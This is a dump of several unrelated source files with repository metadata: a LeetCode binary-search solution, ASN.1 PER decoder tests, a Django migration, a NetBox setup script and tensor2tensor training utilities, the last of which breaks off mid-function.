day = overall_time // (24 * 3600)
overall_time = overall_time % (24 * 3600)
hour = overall_time // 3600
overall_time %= 3600
minutes = overall_time // 60
overall_time %= 60
seconds = overall_time
print("calcutaion time -> %d:%d:%d:%d" % (day, hour, minutes, seconds))
|
[
"87302380@qq.com"
] |
87302380@qq.com
|
fe93f12bb90a727d7242f36b744d28bce12e590c
|
cd78d84441e69c1fc40b6a6e9e235e7cf6882454
|
/python/35.search_insert_position.py
|
8d406dcdc7d9261226127b5e41452b8e2112cda3
|
[] |
no_license
|
buy/leetcode
|
53a12d4e0298284a5a2034c88353d0dc195aa66c
|
da0e834e3f2e3016396fffc96ef943ab9ec58ea4
|
refs/heads/master
| 2021-01-13T01:48:01.176632
| 2015-06-14T06:17:17
| 2015-06-14T06:17:17
| 31,863,627
| 1
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 912
|
py
|
# Given a sorted array and a target value, return the index if the target is found. If not, return the index where it would be if it were inserted in order.
# You may assume no duplicates in the array.
# Here are few examples.
# [1,3,5,6], 5 → 2
# [1,3,5,6], 2 → 1
# [1,3,5,6], 7 → 4
# [1,3,5,6], 0 → 0
class Solution:
# @param {integer[]} nums
# @param {integer} target
# @return {integer}
# 7:14
def searchInsert(self, nums, target):
if not nums or target is None:
return -1
low, high = 0, len(nums) - 1
while low <= high:
mid = (low + high) / 2
if nums[mid] == target:
return mid
elif nums[mid] < target:
low = mid + 1
else:
high = mid - 1
if nums[mid] > target:
return mid
else:
return mid + 1
|
[
"cliu@groupon.com"
] |
cliu@groupon.com
|
72f095e6d0df027da303f85e14998df4d3ce0645
|
5324708cd5cacc5c54cd010e504cbe3c8832d0d2
|
/asn1PERser/test/per/decoder/test_per_decode_sequence_of.py
|
454a489b6d6b8b5180ae31a1de274a578633965a
|
[
"MIT"
] |
permissive
|
erupikus/asn1PERser
|
0965143f12b3b924359452e8b21b9ed459815fd7
|
53ebac8b9a85b29846a64b80938dcd177a66d935
|
refs/heads/master
| 2023-08-09T07:23:52.265908
| 2023-07-14T12:50:22
| 2023-07-14T12:50:22
| 186,060,040
| 6
| 1
|
MIT
| 2023-07-14T12:50:23
| 2019-05-10T22:03:25
|
Python
|
UTF-8
|
Python
| false
| false
| 8,475
|
py
|
import pytest
from asn1PERser.codec.per.decoder import decode as per_decoder
from asn1PERser.test.per.encoder.test_per_encode_sequence_of import SCHEMA_constrained_seq_of_no_extension, \
SCHEMA_constrained_seq_of_extension_present, SCHEMA_no_constrains_sequence_of, DATA_seq_of
@pytest.mark.parametrize("schema, encoded, value", [
(SCHEMA_no_constrains_sequence_of(), '00',
DATA_seq_of(SCHEMA_no_constrains_sequence_of(), i0_is=False, i1_is=False, i2_is=False, i3_is=False, i4_is=False)),
(SCHEMA_no_constrains_sequence_of(), '0103008707',
DATA_seq_of(SCHEMA_no_constrains_sequence_of(), i0_is=True, i1_is=False, i2_is=False, i3_is=False, i4_is=False)),
(SCHEMA_no_constrains_sequence_of(), '020300870702FCB3',
DATA_seq_of(SCHEMA_no_constrains_sequence_of(), i0_is=True, i1_is=True, i2_is=False, i3_is=False, i4_is=False)),
(SCHEMA_no_constrains_sequence_of(), '030300870702FCB30117',
DATA_seq_of(SCHEMA_no_constrains_sequence_of(), i0_is=True, i1_is=True, i2_is=True, i3_is=False, i4_is=False)),
(SCHEMA_no_constrains_sequence_of(), '040300870702FCB3011703030D40',
DATA_seq_of(SCHEMA_no_constrains_sequence_of(), i0_is=True, i1_is=True, i2_is=True, i3_is=True, i4_is=False)),
(SCHEMA_no_constrains_sequence_of(), '050300870702FCB3011703030D400105',
DATA_seq_of(SCHEMA_no_constrains_sequence_of(), i0_is=True, i1_is=True, i2_is=True, i3_is=True, i4_is=True)),
])
def test_no_constrains_sequence_of_integer_can_be_decoded(schema, encoded, value):
assert per_decoder(per_stream=bytearray.fromhex(encoded), asn1Spec=schema) == value
@pytest.mark.parametrize("schema, encoded, value", [
(SCHEMA_constrained_seq_of_no_extension(lb=0, ub=2), '4003008707',
DATA_seq_of(SCHEMA_constrained_seq_of_no_extension(lb=0, ub=2), i0_is=True, i1_is=False, i2_is=False, i3_is=False, i4_is=False)),
(SCHEMA_constrained_seq_of_no_extension(lb=0, ub=2), '800300870702FCB3',
DATA_seq_of(SCHEMA_constrained_seq_of_no_extension(lb=0, ub=2), i0_is=True, i1_is=True, i2_is=False, i3_is=False, i4_is=False)),
(SCHEMA_constrained_seq_of_no_extension(lb=2, ub=5), '000300870702FCB3',
DATA_seq_of(SCHEMA_constrained_seq_of_no_extension(lb=2, ub=5), i0_is=True, i1_is=True, i2_is=False, i3_is=False, i4_is=False)),
(SCHEMA_constrained_seq_of_no_extension(lb=2, ub=5), '400300870702FCB30117',
DATA_seq_of(SCHEMA_constrained_seq_of_no_extension(lb=2, ub=5), i0_is=True, i1_is=True, i2_is=True, i3_is=False, i4_is=False)),
(SCHEMA_constrained_seq_of_no_extension(lb=2, ub=5), '800300870702FCB3011703030D40',
DATA_seq_of(SCHEMA_constrained_seq_of_no_extension(lb=2, ub=5), i0_is=True, i1_is=True, i2_is=True, i3_is=True, i4_is=False)),
(SCHEMA_constrained_seq_of_no_extension(lb=2, ub=5), 'C00300870702FCB3011703030D400105',
DATA_seq_of(SCHEMA_constrained_seq_of_no_extension(lb=2, ub=5), i0_is=True, i1_is=True, i2_is=True, i3_is=True, i4_is=True)),
])
def test_constrained_sequence_of_no_extension_can_be_decoded(schema, encoded, value):
assert per_decoder(per_stream=bytearray.fromhex(encoded), asn1Spec=schema) == value
@pytest.mark.parametrize("schema, encoded, value", [
(SCHEMA_constrained_seq_of_no_extension(lb=1, ub=1), '03008707',
DATA_seq_of(SCHEMA_constrained_seq_of_no_extension(lb=1, ub=1), i0_is=True, i1_is=False, i2_is=False, i3_is=False, i4_is=False)),
(SCHEMA_constrained_seq_of_no_extension(lb=2, ub=2), '0300870702FCB3',
DATA_seq_of(SCHEMA_constrained_seq_of_no_extension(lb=2, ub=2), i0_is=True, i1_is=True, i2_is=False, i3_is=False, i4_is=False)),
(SCHEMA_constrained_seq_of_no_extension(lb=3, ub=3), '0300870702FCB30117',
DATA_seq_of(SCHEMA_constrained_seq_of_no_extension(lb=3, ub=3), i0_is=True, i1_is=True, i2_is=True, i3_is=False, i4_is=False)),
(SCHEMA_constrained_seq_of_no_extension(lb=4, ub=4), '0300870702FCB3011703030D40',
DATA_seq_of(SCHEMA_constrained_seq_of_no_extension(lb=4, ub=4), i0_is=True, i1_is=True, i2_is=True, i3_is=True, i4_is=False)),
(SCHEMA_constrained_seq_of_no_extension(lb=5, ub=5), '0300870702FCB3011703030D400105',
DATA_seq_of(SCHEMA_constrained_seq_of_no_extension(lb=5, ub=5), i0_is=True, i1_is=True, i2_is=True, i3_is=True, i4_is=True)),
])
def test_constrained_sequence_of_of_fixed_length_no_extension_can_be_decoded(schema, encoded, value):
assert per_decoder(per_stream=bytearray.fromhex(encoded), asn1Spec=schema) == value
@pytest.mark.parametrize("schema, encoded, value", [
(SCHEMA_constrained_seq_of_extension_present(lb=0, ub=2), '2003008707',
DATA_seq_of(SCHEMA_constrained_seq_of_extension_present(lb=0, ub=2), i0_is=True, i1_is=False, i2_is=False, i3_is=False, i4_is=False)),
(SCHEMA_constrained_seq_of_extension_present(lb=0, ub=2), '400300870702FCB3',
DATA_seq_of(SCHEMA_constrained_seq_of_extension_present(lb=0, ub=2), i0_is=True, i1_is=True, i2_is=False, i3_is=False, i4_is=False)),
(SCHEMA_constrained_seq_of_extension_present(lb=2, ub=5), '000300870702FCB3',
DATA_seq_of(SCHEMA_constrained_seq_of_extension_present(lb=2, ub=5), i0_is=True, i1_is=True, i2_is=False, i3_is=False, i4_is=False)),
(SCHEMA_constrained_seq_of_extension_present(lb=2, ub=5), '200300870702FCB30117',
DATA_seq_of(SCHEMA_constrained_seq_of_extension_present(lb=2, ub=5), i0_is=True, i1_is=True, i2_is=True, i3_is=False, i4_is=False)),
(SCHEMA_constrained_seq_of_extension_present(lb=2, ub=5), '400300870702FCB3011703030D40',
DATA_seq_of(SCHEMA_constrained_seq_of_extension_present(lb=2, ub=5), i0_is=True, i1_is=True, i2_is=True, i3_is=True, i4_is=False)),
(SCHEMA_constrained_seq_of_extension_present(lb=2, ub=5), '600300870702FCB3011703030D400105',
DATA_seq_of(SCHEMA_constrained_seq_of_extension_present(lb=2, ub=5), i0_is=True, i1_is=True, i2_is=True, i3_is=True, i4_is=True)),
])
def test_constrained_sequence_of_with_extension_and_num_of_elems_is_within_extension_root_can_be_decoded(schema, encoded, value):
assert per_decoder(per_stream=bytearray.fromhex(encoded), asn1Spec=schema) == value
@pytest.mark.parametrize("schema, encoded, value", [
(SCHEMA_constrained_seq_of_extension_present(lb=0, ub=0), '800103008707',
DATA_seq_of(SCHEMA_constrained_seq_of_extension_present(lb=0, ub=0), i0_is=True, i1_is=False, i2_is=False, i3_is=False, i4_is=False)),
(SCHEMA_constrained_seq_of_extension_present(lb=0, ub=0), '80020300870702FCB3',
DATA_seq_of(SCHEMA_constrained_seq_of_extension_present(lb=0, ub=0), i0_is=True, i1_is=True, i2_is=False, i3_is=False, i4_is=False)),
(SCHEMA_constrained_seq_of_extension_present(lb=0, ub=0), '80030300870702FCB30117',
DATA_seq_of(SCHEMA_constrained_seq_of_extension_present(lb=0, ub=0), i0_is=True, i1_is=True, i2_is=True, i3_is=False, i4_is=False)),
(SCHEMA_constrained_seq_of_extension_present(lb=1, ub=1), '80020300870702FCB3',
DATA_seq_of(SCHEMA_constrained_seq_of_extension_present(lb=1, ub=1), i0_is=True, i1_is=True, i2_is=False, i3_is=False, i4_is=False)),
(SCHEMA_constrained_seq_of_extension_present(lb=1, ub=1), '80050300870702FCB3011703030D400105',
DATA_seq_of(SCHEMA_constrained_seq_of_extension_present(lb=1, ub=1), i0_is=True, i1_is=True, i2_is=True, i3_is=True, i4_is=True)),
(SCHEMA_constrained_seq_of_extension_present(lb=1, ub=3), '80040300870702FCB3011703030D40',
DATA_seq_of(SCHEMA_constrained_seq_of_extension_present(lb=1, ub=3), i0_is=True, i1_is=True, i2_is=True, i3_is=True, i4_is=False)),
(SCHEMA_constrained_seq_of_extension_present(lb=1, ub=3), '80050300870702FCB3011703030D400105',
DATA_seq_of(SCHEMA_constrained_seq_of_extension_present(lb=1, ub=3), i0_is=True, i1_is=True, i2_is=True, i3_is=True, i4_is=True)),
(SCHEMA_constrained_seq_of_extension_present(lb=3, ub=4), '80050300870702FCB3011703030D400105',
DATA_seq_of(SCHEMA_constrained_seq_of_extension_present(lb=3, ub=4), i0_is=True, i1_is=True, i2_is=True, i3_is=True, i4_is=True)),
(SCHEMA_constrained_seq_of_extension_present(lb=3, ub=4), '800103008707',
DATA_seq_of(SCHEMA_constrained_seq_of_extension_present(lb=3, ub=4), i0_is=True, i1_is=False, i2_is=False, i3_is=False, i4_is=False)),
])
def test_constrained_sequence_of_with_extension_and_num_of_elems_is_not_within_extension_root_can_be_decoded(schema, encoded, value):
assert per_decoder(per_stream=bytearray.fromhex(encoded), asn1Spec=schema) == value
|
[
"erupikus@gmail.com"
] |
erupikus@gmail.com
|
be783fa8102eeb4d144b2d45dba042eaed4942e4
|
c493abe42e5942dd6a0f64a4a57c2ac7e57f3903
|
/shop/migrations/0001_initial.py
|
908735a3093cf19bb68630df3783dbb44a18bec0
|
[] |
no_license
|
riturajkush/Turbokart-Ecommerce-site
|
e4b7bd30430d38f0dc4d959224685b60f14ff76f
|
852eba399f0ed15ac62e546538c06cc739f807cf
|
refs/heads/main
| 2023-06-27T13:03:27.847751
| 2021-07-29T09:56:30
| 2021-07-29T09:56:30
| 390,667,012
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 627
|
py
|
# Generated by Django 3.1.1 on 2020-12-29 10:48
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Product',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('product_name', models.CharField(max_length=50)),
('desc', models.CharField(max_length=300)),
('pub_date', models.DateField()),
],
),
]
|
[
"kushwaha.rituraj62@gmail.com"
] |
kushwaha.rituraj62@gmail.com
|
2722ba01c870201beefb8bf2569d744c0740c6b6
|
7804b5c5bc44f437899ccb8e789477719666a472
|
/resources/prepare_netbox.py
|
26d39d9d5f446c0f349cc60acc5c9e8a560e0203
|
[
"MIT"
] |
permissive
|
jawhnycooke/nxos-netbox-sync
|
dc45bd0709ada392f4d9731068baa79ce1f6f464
|
7475fa4dc3718b7005c7af856264c4e7fb1af18e
|
refs/heads/master
| 2021-02-28T17:07:28.171852
| 2020-03-07T18:35:28
| 2020-03-07T18:35:28
| 245,715,874
| 1
| 0
|
MIT
| 2020-03-07T22:36:36
| 2020-03-07T22:36:35
| null |
UTF-8
|
Python
| false
| false
| 6,785
|
py
|
import pynetbox
import yaml
import os
data_file = "netbox_initial.yaml"
with open(data_file) as f:
data = yaml.safe_load(f.read())
nb_url = os.getenv("NETBOX_URL")
nb_token = os.getenv("NETBOX_TOKEN")
nb = pynetbox.api(url=nb_url, token=nb_token)
interface_modes = nb.dcim.choices()["interface:mode"]
interface_mode = {
"Access": 100,
"Tagged": 200,
"Tagged All": 300,
}
# sites:
for site in data["sites"]:
print(f"Creating or Updating Site {site['name']}")
nb_data = nb.dcim.sites.get(slug=site["slug"])
if not nb_data:
nb_data = nb.dcim.sites.create(name=site["name"], slug=site["slug"])
# manufacturers
for manufacturer in data["manufacturers"]:
print(f"Creating or Updating Manufacture {manufacturer['name']}")
nb_data = nb.dcim.manufacturers.get(slug=manufacturer["slug"])
if not nb_data:
nb_data = nb.dcim.manufacturers.create(name=manufacturer["name"], slug=manufacturer["slug"])
# device_types
for device_type in data["device_types"]:
print(f"Creating or Updating device_type {device_type['model']}")
nb_data = nb.dcim.device_types.get(slug=device_type["slug"])
if not nb_data:
nb_data = nb.dcim.device_types.create(
model=device_type["model"],
slug=device_type["slug"],
manufacturer=nb.dcim.manufacturers.get(slug=device_type["manufacturer_slug"]).id,
height=device_type["height"]
)
# device_roles
for device_role in data["device_roles"]:
print(f"Creating or Updating device_role {device_role['name']}")
nb_data = nb.dcim.device_roles.get(slug=device_role["slug"])
if not nb_data:
nb_data = nb.dcim.device_roles.create(
name=device_role["name"],
slug=device_role["slug"],
color=device_role["color"]
)
# platforms
for platform in data["platforms"]:
print(f"Creating or Updating platform {platform['name']}")
nb_data = nb.dcim.platforms.get(slug=platform["slug"])
if not nb_data:
nb_data = nb.dcim.platforms.create(
name=platform["name"],
slug=platform["slug"],
manufacturer=nb.dcim.manufacturers.get(slug=platform["manufacturer_slug"]).id,
)
# vrfs
for vrf in data["vrfs"]:
print(f"Creating or Updating vrf {vrf['name']}")
nb_data = nb.ipam.vrfs.get(rd=vrf["rd"])
if not nb_data:
nb_data = nb.ipam.vrfs.create(name=vrf["name"], rd=vrf["rd"])
# vlan-groups
for group in data["vlan_groups"]:
print(f"Creating or updating vlan-group {group['name']}")
nb_group = nb.ipam.vlan_groups.get(slug=group["slug"])
if not nb_group:
nb_group = nb.ipam.vlan_groups.create(
name = group["name"],
slug = group["slug"],
site=nb.dcim.sites.get(slug=group["site_slug"]).id,
)
# vlans
for vlan in group["vlans"]:
print(f"Creating or updating vlan {vlan['name']}")
nb_vlan = nb.ipam.vlans.get(
group_id=nb_group.id,
vid=vlan["vid"],
)
if not nb_vlan:
nb_vlan = nb.ipam.vlans.create(
group=nb_group.id,
site=nb_group.site.id,
name=vlan["name"],
vid=vlan["vid"],
description=vlan["description"],
)
if "prefix" in vlan.keys():
print(f"Configuring prefix {vlan['prefix']}")
nb_prefix = nb.ipam.prefixes.get(
vrf_id = nb.ipam.vrfs.get(rd=vlan["vrf"]).id,
site_id=nb_group.site.id,
vlan_vid=nb_vlan.vid,
)
if not nb_prefix:
# print(" Creating new prefix")
nb_prefix = nb.ipam.prefixes.create(
prefix=vlan["prefix"],
vrf=nb.ipam.vrfs.get(rd=vlan["vrf"]).id,
description=vlan["description"],
site=nb_group.site.id,
vlan=nb_vlan.id
)
# devices
for device in data["devices"]:
print(f"Creating or Updating device {device['name']}")
nb_device = nb.dcim.devices.get(name=device["name"])
if not nb_device:
nb_device = nb.dcim.devices.create(
name=device["name"],
manufacturer=nb.dcim.manufacturers.get(slug=device["manufacturer_slug"]).id,
site=nb.dcim.sites.get(slug=device["site_slug"]).id,
device_role=nb.dcim.device_roles.get(slug=device["device_role_slug"]).id,
device_type=nb.dcim.device_types.get(slug=device["device_types_slug"]).id,
)
for interface in device["interfaces"]:
print(f" Creating or updating interface {interface['name']}")
nb_interface = nb.dcim.interfaces.get(
device_id=nb_device.id,
name=interface["name"]
)
if not nb_interface:
nb_interface = nb.dcim.interfaces.create(
device=nb_device.id,
name=interface["name"],
)
if "description" in interface.keys():
nb_interface.description = interface["description"]
if "mgmt_only" in interface.keys():
nb_interface.mgmt_only = interface["mgmt_only"]
if "enabled" in interface.keys():
nb_interface.enabled = interface["enabled"]
if "mode" in interface.keys():
nb_interface.mode = interface_mode[interface["mode"]]
if "untagged_vlan" in interface.keys():
nb_interface.untagged_vlan = nb.ipam.vlans.get(
name=interface["untagged_vlan"]
).id
if "tagged_vlans" in interface.keys():
vl = [ nb.ipam.vlans.get(name=vlan_name).id for vlan_name in interface["tagged_vlans"] ]
# print("VLAN LIST")
# print(vl)
nb_interface.tagged_vlans = vl
if "ip_addresses" in interface.keys():
for ip in interface["ip_addresses"]:
print(f" Adding IP {ip['address']}")
nb_ipadd = nb.ipam.ip_addresses.get(
address = ip["address"],
vrf_id = nb.ipam.vrfs.get(rd=ip["vrf"]).id,
)
if not nb_ipadd:
nb_ipadd = nb.ipam.ip_addresses.create(
address = ip["address"],
vrf = nb.ipam.vrfs.get(rd=ip["vrf"]).id,
)
nb_ipadd.interface = nb_interface.id
nb_ipadd.save()
if "primary" in ip.keys():
nb_device.primary_ip4 = nb_ipadd.id
nb_device.save()
nb_interface.save()
|
[
"hank.preston@gmail.com"
] |
hank.preston@gmail.com
|
aeb851e7c40a6aac80481d0f78a38b4819faf2a5
|
a9758f67b329e0f8e3da80499e3f9bd85b12ea84
|
/tensor2tensor/utils/trainer_utils.py
|
e90e2dd103fe5f8571d40327965c8cfbc2784f83
|
[
"Apache-2.0"
] |
permissive
|
krenshaw2018/tensor2tensor
|
c9ed02c4c98ccc002a5d484777be6bf2adc230cf
|
8e2389021643774f81a3af643e55a856896aef5c
|
refs/heads/master
| 2020-03-24T05:12:57.945479
| 2018-06-15T10:59:14
| 2018-06-15T10:59:14
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 14,885
|
py
|
# coding=utf-8
# Copyright 2017 The Tensor2Tensor Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Utilities for trainer binary."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
import sys
# Dependency imports
from tensor2tensor import models # pylint: disable=unused-import
from tensor2tensor.data_generators import all_problems # pylint: disable=unused-import
from tensor2tensor.utils import data_reader
from tensor2tensor.utils import decoding
from tensor2tensor.utils import devices
from tensor2tensor.utils import input_fn_builder
from tensor2tensor.utils import model_builder
from tensor2tensor.utils import registry
import tensorflow as tf
from tensorflow.contrib.learn.python.learn import learn_runner
from tensorflow.python import debug
flags = tf.flags
FLAGS = flags.FLAGS
flags.DEFINE_bool("registry_help", False,
"If True, logs the contents of the registry and exits.")
flags.DEFINE_bool("tfdbg", False,
"If True, use the TF debugger CLI on train/eval.")
flags.DEFINE_bool("export_saved_model", False,
"Whether to export a SavedModel for serving.")
flags.DEFINE_bool("dbgprofile", False,
"If True, record the timeline for chrome://tracing/.")
flags.DEFINE_string("model", "", "Which model to use.")
flags.DEFINE_string("hparams_set", "", "Which parameters to use.")
flags.DEFINE_string("hparams_range", "", "Parameters range.")
flags.DEFINE_string(
"hparams", "",
"""A comma-separated list of `name=value` hyperparameter values. This flag
is used to override hyperparameter settings either when manually selecting
hyperparameters or when using Vizier. If a hyperparameter setting is
specified by this flag then it must be a valid hyperparameter name for the
model.""")
flags.DEFINE_string("problems", "", "Dash separated list of problems to "
"solve.")
flags.DEFINE_string("data_dir", None, "Directory with training data.")
flags.DEFINE_integer("train_steps", 250000,
"The number of steps to run training for.")
flags.DEFINE_bool("eval_run_autoregressive", False,
"Run eval autoregressively where we condition on previous"
"generated output instead of the actual target.")
flags.DEFINE_bool("eval_use_test_set", False,
"Whether to use the '-test' data for EVAL (and PREDICT).")
flags.DEFINE_integer("keep_checkpoint_max", 20,
"How many recent checkpoints to keep.")
flags.DEFINE_bool("experimental_optimize_placement", False,
"Optimize ops placement with experimental session options.")
flags.DEFINE_integer("keep_checkpoint_every_n_hours", 10000,
"Number of hours between each checkpoint to be saved. "
"The default value 10,000 hours effectively disables it.")
flags.DEFINE_integer("save_checkpoints_secs", 0,
"Save checkpoints every this many seconds. "
"Default=0 means let tensorflow.contrib.learn.python.learn"
" decide, which is currently set to 600 = 10 minutes.")
flags.DEFINE_bool("log_device_placement", False,
"Whether to log device placement.")
# Distributed training flags
flags.DEFINE_integer("local_eval_frequency", 2000,
"Run evaluation every this steps during local training.")
flags.DEFINE_bool("locally_shard_to_cpu", False,
"Use CPU as a sharding device running locally. This allows "
"to test sharded model construction on a machine with 1 GPU.")
flags.DEFINE_bool("daisy_chain_variables", True,
"copy variables around in a daisy chain")
flags.DEFINE_bool("sync", False, "Sync compute on PS.")
flags.DEFINE_string("worker_job", "/job:localhost", "name of worker job")
flags.DEFINE_integer("worker_gpu", 1, "How many GPUs to use.")
flags.DEFINE_integer("worker_replicas", 1, "How many workers to use.")
flags.DEFINE_integer("worker_id", 0, "Which worker task are we.")
flags.DEFINE_float("worker_gpu_memory_fraction", 0.95,
"Fraction of GPU memory to allocate.")
flags.DEFINE_integer("ps_gpu", 0, "How many GPUs to use per ps.")
flags.DEFINE_string("gpu_order", "", "Optional order for daisy-chaining gpus."
" e.g. \"1 3 2 4\"")
flags.DEFINE_string("ps_job", "/job:ps", "name of ps job")
flags.DEFINE_integer("ps_replicas", 0, "How many ps replicas.")
# Decoding flags
flags.DEFINE_string(
"decode_hparams", "",
"Comma-separated list of name=value pairs to control decode behavior. "
"See decoding.decode_hparams for defaults.")
def make_experiment_fn(data_dir, model_name, train_steps, eval_steps):
"""Returns experiment_fn for learn_runner. Wraps create_experiment."""
def experiment_fn(run_config, hparams):
return create_experiment(
data_dir,
model_name=model_name,
train_steps=train_steps,
eval_steps=eval_steps,
hparams=hparams,
run_config=run_config)
return experiment_fn
def create_experiment(data_dir, model_name, train_steps, eval_steps, hparams,
run_config):
"""Create Experiment."""
estimator, input_fns = create_experiment_components(
data_dir=data_dir,
model_name=model_name,
hparams=hparams,
run_config=run_config)
train_monitors = []
eval_hooks = []
if FLAGS.tfdbg:
hook = debug.LocalCLIDebugHook()
train_monitors.append(hook)
eval_hooks.append(hook)
if FLAGS.dbgprofile:
# Recorded traces can be visualized with chrome://tracing/
# The memory/tensor lifetime is also profiled
train_monitors.append(
tf.contrib.hooks.ProfilerHook(
save_steps=10,
output_dir=run_config.model_dir,
show_dataflow=True,
show_memory=True,))
optional_kwargs = {}
if FLAGS.export_saved_model:
assert len(hparams.problem_instances) == 1
problem = hparams.problem_instances[0]
optional_kwargs["export_strategies"] = [
make_export_strategy(problem, hparams)
]
return tf.contrib.learn.Experiment(
estimator=estimator,
train_input_fn=input_fns[tf.estimator.ModeKeys.TRAIN],
eval_input_fn=input_fns[tf.estimator.ModeKeys.EVAL],
train_steps=train_steps,
eval_steps=eval_steps,
min_eval_frequency=FLAGS.local_eval_frequency,
train_monitors=train_monitors,
eval_hooks=eval_hooks,
eval_delay_secs=0,
**optional_kwargs)
def make_export_strategy(problem, hparams):
return tf.contrib.learn.make_export_strategy(
lambda: data_reader.serving_input_fn(problem, hparams), as_text=True)
def create_experiment_components(data_dir, model_name, hparams, run_config):
"""Constructs and returns Estimator and train/eval input functions."""
tf.logging.info("Creating experiment, storing model files in %s",
run_config.model_dir)
add_problem_hparams(hparams, FLAGS.problems)
# hparams batch_size is used as minibatch size instead of tokens in batch
batch_size = (hparams.use_fixed_batch_size and hparams.batch_size) or None
num_datashards = devices.data_parallelism().n
train_input_fn = input_fn_builder.build_input_fn(
mode=tf.estimator.ModeKeys.TRAIN,
hparams=hparams,
data_dir=data_dir,
num_datashards=num_datashards,
worker_replicas=FLAGS.worker_replicas,
worker_id=FLAGS.worker_id,
batch_size=batch_size)
eval_input_fn = input_fn_builder.build_input_fn(
mode=tf.estimator.ModeKeys.EVAL,
hparams=hparams,
data_dir=data_dir,
num_datashards=num_datashards,
worker_replicas=FLAGS.worker_replicas,
worker_id=FLAGS.worker_id,
dataset_split="test" if FLAGS.eval_use_test_set else None)
model_fn = model_builder.build_model_fn(
model_name,
problem_names=FLAGS.problems.split("-"),
train_steps=FLAGS.train_steps,
worker_id=FLAGS.worker_id,
worker_replicas=FLAGS.worker_replicas,
eval_run_autoregressive=FLAGS.eval_run_autoregressive,
decode_hparams=decoding.decode_hparams(FLAGS.decode_hparams))
estimator = tf.estimator.Estimator(
model_fn=model_fn,
model_dir=run_config.model_dir,
params=hparams,
config=run_config)
return estimator, {
tf.estimator.ModeKeys.TRAIN: train_input_fn,
tf.estimator.ModeKeys.EVAL: eval_input_fn
}
def log_registry():
if FLAGS.registry_help:
tf.logging.info(registry.help_string())
sys.exit(0)
def add_problem_hparams(hparams, problems):
"""Add problem hparams for the problems."""
hparams.problems = []
hparams.problem_instances = []
for problem_name in problems.split("-"):
try:
problem = registry.problem(problem_name)
except LookupError:
all_problem_names = sorted(registry.list_problems())
error_lines = ["%s not in the set of supported problems:" % problem_name
] + all_problem_names
error_msg = "\n * ".join(error_lines)
raise LookupError(error_msg)
p_hparams = problem.get_hparams(hparams)
hparams.problem_instances.append(problem)
hparams.problems.append(p_hparams)
def save_metadata(output_dir, hparams):
"""Saves FLAGS and hparams to output_dir."""
# Save FLAGS in txt file
if hasattr(FLAGS, "flags_into_string"):
flags_str = FLAGS.flags_into_string()
t2t_flags_str = "\n".join([
"--%s=%s" % (f.name, f.value)
for f in FLAGS.flags_by_module_dict()[
"tensor2tensor.utils.trainer_utils"]
])
else:
flags_dict = FLAGS.__dict__["__flags"]
flags_str = "\n".join(
["--%s=%s" % (name, str(f)) for (name, f) in flags_dict.items()])
t2t_flags_str = None
flags_txt = os.path.join(output_dir, "flags.txt")
with tf.gfile.Open(flags_txt, "w") as f:
f.write(flags_str)
if t2t_flags_str:
t2t_flags_txt = os.path.join(output_dir, "flags_t2t.txt")
with tf.gfile.Open(t2t_flags_txt, "w") as f:
f.write(t2t_flags_str)
# Save hparams as hparams.json
hparams_fname = os.path.join(output_dir, "hparams.json")
with tf.gfile.Open(hparams_fname, "w") as f:
f.write(hparams.to_json())
def create_hparams(params_id, data_dir, passed_hparams=None):
"""Returns hyperparameters, including any flag value overrides.
If the hparams FLAG is set, then it will use any values specified in
hparams to override any individually-set hyperparameter. This logic
allows tuners to override hyperparameter settings to find optimal values.
Args:
params_id: which set of parameters to choose (must be in _PARAMS above).
data_dir: the directory containing the training data.
passed_hparams: command-line overrides for some hparams.
Returns:
The hyperparameters as a tf.contrib.training.HParams object.
"""
hparams = registry.hparams(params_id)()
hparams.add_hparam("data_dir", data_dir)
# Command line flags override any of the preceding hyperparameter values.
if passed_hparams:
hparams = hparams.parse(passed_hparams)
return hparams
def create_run_config(output_dir):
"""Create a RunConfig object."""
run_config = tf.contrib.learn.RunConfig(
model_dir=output_dir,
master=FLAGS.master,
gpu_memory_fraction=FLAGS.worker_gpu_memory_fraction,
session_config=session_config(),
keep_checkpoint_max=FLAGS.keep_checkpoint_max,
keep_checkpoint_every_n_hours=FLAGS.keep_checkpoint_every_n_hours,
save_checkpoints_secs=FLAGS.save_checkpoints_secs)
return run_config
def run(data_dir, model, output_dir, train_steps, eval_steps, schedule):
"""Runs an Estimator locally or distributed.
Args:
data_dir: The directory the data can be found in.
model: The name of the model to use.
output_dir: The directory to store outputs in.
train_steps: The number of steps to run training for.
eval_steps: The number of steps to run evaluation for.
schedule: (str) The schedule to run. The value here must
be the name of one of Experiment's methods.
"""
exp_fn = make_experiment_fn(
data_dir=data_dir,
model_name=model,
train_steps=train_steps,
eval_steps=eval_steps)
# Create hparams and run_config
run_config = create_run_config(output_dir)
hparams = create_hparams(
FLAGS.hparams_set, data_dir, passed_hparams=FLAGS.hparams)
if is_chief():
save_metadata(output_dir, hparams)
learn_runner.run(
experiment_fn=exp_fn,
schedule=schedule,
run_config=run_config,
hparams=hparams)
def validate_flags():
"""Validate command line flags."""
if not FLAGS.model:
raise ValueError("Must specify a model with --model.")
if not FLAGS.problems:
raise ValueError("Must specify a set of problems with --problems.")
if not (FLAGS.hparams_set or FLAGS.hparams_range):
raise ValueError("Must specify either --hparams_set or --hparams_range.")
if not FLAGS.schedule:
raise ValueError("Must specify --schedule.")
if not FLAGS.output_dir:
FLAGS.output_dir = "/tmp/tensor2tensor"
tf.logging.warning("It is strongly recommended to specify --output_dir. "
"Using default output_dir=%s.", FLAGS.output_dir)
if not FLAGS.data_dir:
raise ValueError("Must specify --data_dir.")
def is_chief():
schedules = ["train", "train_and_evaluate"]
return FLAGS.worker_id == 0 and FLAGS.schedule in schedules
def session_config():
"""The TensorFlow Session config to use."""
